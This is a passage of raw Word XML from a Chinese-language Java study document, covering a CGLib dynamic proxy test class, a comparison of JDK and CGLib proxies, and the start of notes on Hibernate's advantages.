          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>import testAOP.Saying;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>import testAOP.SayingImpl;</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>public class CglibProxyTest {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="DDEDFB"/>
        <w:spacing w:after="38" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>    public static void main(String[] args) {</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        CglibProxy proxy = new CglibProxy();</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        //</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>通过动态生成子类的方式创建代理类</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        Saying target = (Saying) proxy.getProxy(SayingImpl.class);</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        target.sayHello("</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>小明</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        target.talking("</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>小丽</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>    }</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000A3286" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>结果与</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>动态代理没有任何区别。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="00B80873" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000E477A" w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r w:rsidR="000E477A" w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>动态代理和</w:t>
      </w:r>
      <w:r w:rsidR="000E477A" w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CGLib</w:t>
      </w:r>
      <w:r w:rsidR="000E477A" w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>动态代理都是运行时增强，通过将横切代码植入代理类的方式增强。与此不同的是</w:t>
      </w:r>
      <w:r w:rsidR="000E477A" w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>AspectJ</w:t>
      </w:r>
      <w:r w:rsidR="000E477A" w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，它能够在通过特殊的编译器在编译时期将横切代码植入增强，这样的增强处理在运行时候更有优势，因为</w:t>
      </w:r>
      <w:r w:rsidR="000E477A" w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r w:rsidR="000E477A" w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>动态代理和</w:t>
      </w:r>
      <w:r w:rsidR="000E477A" w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>CGLib</w:t>
      </w:r>
      <w:r w:rsidR="000E477A" w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>动态代理每次运行都需要增强。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cglib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理比较</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CGLib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建的动态代理对象性能比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>创建的动态代理对象的性能高不少，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CGLib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在创建代理对象时所花费的时间却比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>多得多，所以对于单例的对象，因为无需频繁创建对象，用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CGLib</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>合适，反之，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方式要更为合适一些。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A748F4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>同时，由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A748F4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CGLib</w:t>
      </w:r>
      <w:r w:rsidRPr="00A748F4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>由于是采用动态创建子类的方法，对于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A748F4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r w:rsidRPr="00A748F4">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法，无法进行代理</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A42A11" w:rsidRPr="004141C4" w:rsidRDefault="00EA2F87" w:rsidP="000E477A">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A42A11">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>CGLIB(Code Generation Library)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="000E477A" w:rsidRDefault="000E477A" w:rsidP="00E71278">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CB63A3" w:rsidRPr="00F41A4C" w:rsidRDefault="00C31961" w:rsidP="00743AD8">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00743AD8">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00743AD8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="007C4A97" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00077A41" w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000765DD" w:rsidRPr="00F41A4C">
        <w:t>hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00252CE1" w:rsidRPr="00F41A4C" w:rsidRDefault="003B5170" w:rsidP="00252CE1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>开源的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ORM</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>框架，</w:t>
      </w:r>
      <w:r w:rsidR="0051187B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidR="0051187B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>JDBC</w:t>
      </w:r>
      <w:r w:rsidR="0051187B" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidR="00252CE1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>轻量级的封装</w:t>
      </w:r>
      <w:r w:rsidR="00252CE1" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456AEC" w:rsidRPr="00F41A4C" w:rsidRDefault="00456AEC" w:rsidP="00456AEC">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>优点</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00456AEC" w:rsidRPr="00F41A4C" w:rsidRDefault="00865053" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>按对象操作</w:t>
      </w:r>
      <w:r w:rsidR="00D36C78" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，面向对象思想</w:t>
      </w:r>
      <w:r w:rsidR="00E87D9C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，移植性好</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000765DD" w:rsidRPr="00F41A4C" w:rsidRDefault="00351655" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>实体生成表，方便</w:t>
      </w:r>
      <w:r w:rsidR="00E96D8E" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>开发</w:t>
      </w:r>
      <w:r w:rsidR="00307F76" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>与升级</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00351655" w:rsidRPr="00F41A4C" w:rsidRDefault="008223EE" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Hibernate</w:t>
      </w:r>
      <w:r w:rsidR="00374B6A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>一级、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>二级缓存</w:t>
      </w:r>
      <w:r w:rsidR="00374B6A" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>：为了降低访问物理数据库的访问次数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008223EE" w:rsidRPr="00F41A4C" w:rsidRDefault="008223EE" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Hql</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
